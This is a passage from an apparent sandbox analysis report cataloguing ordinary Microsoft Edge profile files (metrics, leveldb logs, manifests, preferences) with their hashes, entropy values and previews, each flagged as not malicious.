                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):4194304
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.038984284250279395
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:0Y0o3ZmP6rVZrJu4c4NgsXJiwk0foYhwNxwBIegTQcdARDin8y08Tcm2RGOdB:z0sZHHioJhwstCZ+O08T2RGOD
                                                                                                                                                                                                                                                                                    MD5:D0819DB0577CC2AE9BDED97890108BF1
                                                                                                                                                                                                                                                                                    SHA1:C63071CEB8309C7ACE037B0D17416DBA3CBBA2E4
                                                                                                                                                                                                                                                                                    SHA-256:70A7BDD796247254417C93B81BB7B3C7361BEB71AAA34173C583F6A6D8587AEE
                                                                                                                                                                                                                                                                                    SHA-512:336642A96894802716C6342A98761464272FF09981B996D13F24FAA41C4096BBA96887FBC8BA972113AFBA9DFAFFAFA9E4CA5C7BD9819D1FB0F5E6E06DDB4B6F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:...@..@...@.....C.].....@................^..pN..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".jlwvtg20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(..................... ..<.w..U'D.I..G.......W6....{....>.........."....."...2...".*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z...........................................................
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):4194304
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0313085443424715
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:Nm0o3ZmP6rfZyJu4UZYXqhgrhBDhWOBVTflRQcxmOD+:k0sZkGcbhh3b4OD
                                                                                                                                                                                                                                                                                    MD5:2BEA56221C52B4E84FEE81123E7C99D3
                                                                                                                                                                                                                                                                                    SHA1:A4862AB221DB46F197191734C7D269C7E00421F2
                                                                                                                                                                                                                                                                                    SHA-256:BC42D341FF5DEB95AD96510728609B16B630FDB4C3D5827736C826319B5754C8
                                                                                                                                                                                                                                                                                    SHA-512:E84FA48865078C2DE72E6204C6A3E886532AB8CA4C81CC11C1B7EC8CB0888795FC9FD61D482024F4C82300D33C359E98FEA3C6033BBD4774F4F6CAB09635E433
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:...@..@...@.....C.].....@................M..xL..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".jlwvtg20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(..................... ..<.w..U'D.I..G.......W6....{....>.........."....."...2...".*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z...........................................................
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):4194304
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.027805344126750595
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:TP0o3ZDP6r5Zp0Ju4JiYXqhgbE6hU4BVoUfO:L0sZS0uc/hN1
                                                                                                                                                                                                                                                                                    MD5:972F050EF1EEFB8D18C30F007133F483
                                                                                                                                                                                                                                                                                    SHA1:99AF020E4075FEB2B590D45C1C32C8746C369D95
                                                                                                                                                                                                                                                                                    SHA-256:646CBED1A08365A0F8E784F77C190DA2989A570AE15657B79B793DA343C4CC8B
                                                                                                                                                                                                                                                                                    SHA-512:DB81436FF3DDE02A506CE6B184CD237BC973046BD41B3CC02C0464C3E5009BAE088CBFD071FB7D0BF00B81EE718D958C0A941E24C03FC93A4E139ABE0F382D2E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:...@..@...@.....C.].....@................C.. C..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".jlwvtg20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(.....................$..<.w..U?:K.'D.I..G.......W6....{....>.........."....."...2...".*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z.......................................................
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                    Size (bytes):280
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.0461987566804245
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:FiWWltlApdeXKe/wBVP/Sh/JzvPWVcRVEVg3WWD5gtl:o1ApdeaOwBVsJDu2ziy5gX
                                                                                                                                                                                                                                                                                    MD5:7EFBF40B6F9FE36D9122EFA874A9EEFE
                                                                                                                                                                                                                                                                                    SHA1:3FCF99E7505914A8EE21AC1A3373628E09D52197
                                                                                                                                                                                                                                                                                    SHA-256:6B8B4B56501AAEEFB13D09FABEE345C17F4E31FA12998A97296773785956D040
                                                                                                                                                                                                                                                                                    SHA-512:A3CCC4C472B0135F180418CE975CF97B42CB73B4C8361BDDFE322F8594AA32041D3DED8D925F1C384AB8CE61D26615D87C79C2D5FB4F7ADF24331B5892044AE2
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:sdPC......................X..<EE..r/y...................................................................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):25012
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.567399906177493
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:DTvgsuWPKcfVQ8F1+UoAYDCx9Tuqh0VfUC9xbog/OVFUAVirw9pTtuG:DTvgsuWPKcfVQu1jac7VHvt1
                                                                                                                                                                                                                                                                                    MD5:753D1929F220D7293269A53A6C825F10
                                                                                                                                                                                                                                                                                    SHA1:E6592029A78018F6C6E392E47D2820A291F9AD02
                                                                                                                                                                                                                                                                                    SHA-256:EF9C14C088AA439E2C960C0FFFDEA5723F201D051D7CB2069FC2BCCFA359B8DE
                                                                                                                                                                                                                                                                                    SHA-512:EE63862EC91D38EFDE23594A2D34D07C3F3E187F0E9C312BBB02FF8A00C94A65BDA2E9B309BA332F5C6AA4329D21040C5B95E604913D5EE497C66DFEBF6A83F5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376697181232775","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376697181232775","location":5,"ma
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                    Size (bytes):336
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.103101917965337
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:HE98GKlyq2P923oH+Tcwt9Eh1tIFUt8YE98Wr1Zmw+YE98OujRkwO923oH+TcwtY:k98GGyv4Yeb9Eh16FUt8/98S/+/98OGQ
                                                                                                                                                                                                                                                                                    MD5:ED80EADDF6038724AEE8DFDFBB14866C
                                                                                                                                                                                                                                                                                    SHA1:69F918CDFFAEE259D70AAA92C7E174E277B9E347
                                                                                                                                                                                                                                                                                    SHA-256:D476610007CEAD9B58EA5D13E0C0A8747315CC9AD6737C577535B5D83A41733E
                                                                                                                                                                                                                                                                                    SHA-512:8500D2E639D5C66978684890943F3F0781C497CAF9FDBF51B4ED5C881F1825C3BBB929FF6600F2720558FAA01A9CED3E7CBE7ED206E74245C39F2891F5DDC7F8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/11/21-16:13:12.751 1e70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/21-16:13:12.754 1e70 Recovering log #3.2024/11/21-16:13:12.759 1e70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):336
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.103101917965337
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:HE98GKlyq2P923oH+Tcwt9Eh1tIFUt8YE98Wr1Zmw+YE98OujRkwO923oH+TcwtY:k98GGyv4Yeb9Eh16FUt8/98S/+/98OGQ
                                                                                                                                                                                                                                                                                    MD5:ED80EADDF6038724AEE8DFDFBB14866C
                                                                                                                                                                                                                                                                                    SHA1:69F918CDFFAEE259D70AAA92C7E174E277B9E347
                                                                                                                                                                                                                                                                                    SHA-256:D476610007CEAD9B58EA5D13E0C0A8747315CC9AD6737C577535B5D83A41733E
                                                                                                                                                                                                                                                                                    SHA-512:8500D2E639D5C66978684890943F3F0781C497CAF9FDBF51B4ED5C881F1825C3BBB929FF6600F2720558FAA01A9CED3E7CBE7ED206E74245C39F2891F5DDC7F8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/11/21-16:13:12.751 1e70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/21-16:13:12.754 1e70 Recovering log #3.2024/11/21-16:13:12.759 1e70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):345
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.111284959803201
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:HE98jSq2P923oH+TcwtnG2tMsIFUt8YE98jbZmw+YE98jxkwO923oH+TcwtnG2tF:k98+v4Yebn9GFUt8/98H/+/98V5LYebB
                                                                                                                                                                                                                                                                                    MD5:3AF0CA35D542FAE541A1DE56120F99E0
                                                                                                                                                                                                                                                                                    SHA1:697722652837B8752AA993ED989843FD8A9A9A07
                                                                                                                                                                                                                                                                                    SHA-256:DAEDEA4C01F622B298EF86FB45C7578120048945F6F47BE38D75053D2AEA49E2
                                                                                                                                                                                                                                                                                    SHA-512:0B2CE6F5E734E96FB19901D9DFE627F4BF28D6C849523EE6C34E7798533A606330A8265AB0016BA35D33E3BEFDF16CC11143518B0AA6B3B0FFC9561F551B5904
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/11/21-16:13:01.341 ee4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/21-16:13:01.341 ee4 Recovering log #3.2024/11/21-16:13:01.341 ee4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):345
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.111284959803201
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:HE98jSq2P923oH+TcwtnG2tMsIFUt8YE98jbZmw+YE98jxkwO923oH+TcwtnG2tF:k98+v4Yebn9GFUt8/98H/+/98V5LYebB
                                                                                                                                                                                                                                                                                    MD5:3AF0CA35D542FAE541A1DE56120F99E0
                                                                                                                                                                                                                                                                                    SHA1:697722652837B8752AA993ED989843FD8A9A9A07
                                                                                                                                                                                                                                                                                    SHA-256:DAEDEA4C01F622B298EF86FB45C7578120048945F6F47BE38D75053D2AEA49E2
                                                                                                                                                                                                                                                                                    SHA-512:0B2CE6F5E734E96FB19901D9DFE627F4BF28D6C849523EE6C34E7798533A606330A8265AB0016BA35D33E3BEFDF16CC11143518B0AA6B3B0FFC9561F551B5904
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/11/21-16:13:01.341 ee4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/21-16:13:01.341 ee4 Recovering log #3.2024/11/21-16:13:01.341 ee4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                    Size (bytes):33
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                    MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                    SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                    SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                    SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):311
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.168254554215612
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:HE98oouM1923oH+Tcwtk2WwnvB2KLlVE98OBPjyq2P923oH+Tcwtk2WwnvIFUv:k98+hYebkxwnvFLs98GWv4YebkxwnQF2
                                                                                                                                                                                                                                                                                    MD5:5C24B91912B76090E1694E1C5A127569
                                                                                                                                                                                                                                                                                    SHA1:10764E3D0F142B367C8D60C7A7BDA4F844DF679F
                                                                                                                                                                                                                                                                                    SHA-256:9AEDCABFD5D39ED34F5944FE62199D56310A222ABBD8C786C716058385E77910
                                                                                                                                                                                                                                                                                    SHA-512:99A1C51E2CF61844B462C7A56C1BFD0379535F1180980F7DD8E9D5B6E6DA0CE881D350052F76252EDD43B4D619CDE5240BD5A7A4945BB9FC2751CACDC2077B68
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/11/21-16:13:12.739 1e94 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/11/21-16:13:12.765 1e94 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):380
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                    MD5:9FE07A071FDA31327FA322B32FCA0B7E
                                                                                                                                                                                                                                                                                    SHA1:A3E0BAE8853A163C9BB55F68616C795AAAF462E8
                                                                                                                                                                                                                                                                                    SHA-256:E02333C0359406998E3FED40B69B61C9D28B2117CF9E6C0239E2E13EC13BA7C8
                                                                                                                                                                                                                                                                                    SHA-512:9CCE621CD5B7CFBD899ABCBDD71235776FF9FF7DEA19C67F86E7F0603F7B09CA294CC16B672B742FA9B51387B2F0A501C3446872980BCA69ADE13F2B5677601D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):321
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.1061315007605
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:HE98ORN4q2P923oH+Tcwt8aPrqIFUt8YE98RZmw+YE98LkwO923oH+Tcwt8amLJ:k98OL4v4YebL3FUt8/98R/+/98L5LYeo
                                                                                                                                                                                                                                                                                    MD5:0CE1D4851C7555B629369AC56F49EF03
                                                                                                                                                                                                                                                                                    SHA1:B9AED1809119B8D180AD7E86BEBE5C6006F18E02
                                                                                                                                                                                                                                                                                    SHA-256:788A53DC796EEC7931AAD5BFCE2B10DED313FB799FB383C294D597FC66134AEA
                                                                                                                                                                                                                                                                                    SHA-512:32A7CD594F456BC1D6AC1B71DA231BFE693D6268075D8BD6D53DD223BE3693C13A3E10B36FF5ABD513474898C0F6A1FED764CC035AFB7C0FBCEEECFCCDD11728
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/11/21-16:13:01.320 714 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/21-16:13:01.323 714 Recovering log #3.2024/11/21-16:13:01.323 714 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):321
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.1061315007605
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:HE98ORN4q2P923oH+Tcwt8aPrqIFUt8YE98RZmw+YE98LkwO923oH+Tcwt8amLJ:k98OL4v4YebL3FUt8/98R/+/98L5LYeo
                                                                                                                                                                                                                                                                                    MD5:0CE1D4851C7555B629369AC56F49EF03
                                                                                                                                                                                                                                                                                    SHA1:B9AED1809119B8D180AD7E86BEBE5C6006F18E02
                                                                                                                                                                                                                                                                                    SHA-256:788A53DC796EEC7931AAD5BFCE2B10DED313FB799FB383C294D597FC66134AEA
                                                                                                                                                                                                                                                                                    SHA-512:32A7CD594F456BC1D6AC1B71DA231BFE693D6268075D8BD6D53DD223BE3693C13A3E10B36FF5ABD513474898C0F6A1FED764CC035AFB7C0FBCEEECFCCDD11728
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/11/21-16:13:01.320 714 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/21-16:13:01.323 714 Recovering log #3.2024/11/21-16:13:01.323 714 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):380
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                    MD5:9FE07A071FDA31327FA322B32FCA0B7E
                                                                                                                                                                                                                                                                                    SHA1:A3E0BAE8853A163C9BB55F68616C795AAAF462E8
                                                                                                                                                                                                                                                                                    SHA-256:E02333C0359406998E3FED40B69B61C9D28B2117CF9E6C0239E2E13EC13BA7C8
                                                                                                                                                                                                                                                                                    SHA-512:9CCE621CD5B7CFBD899ABCBDD71235776FF9FF7DEA19C67F86E7F0603F7B09CA294CC16B672B742FA9B51387B2F0A501C3446872980BCA69ADE13F2B5677601D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):325
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.148306293093424
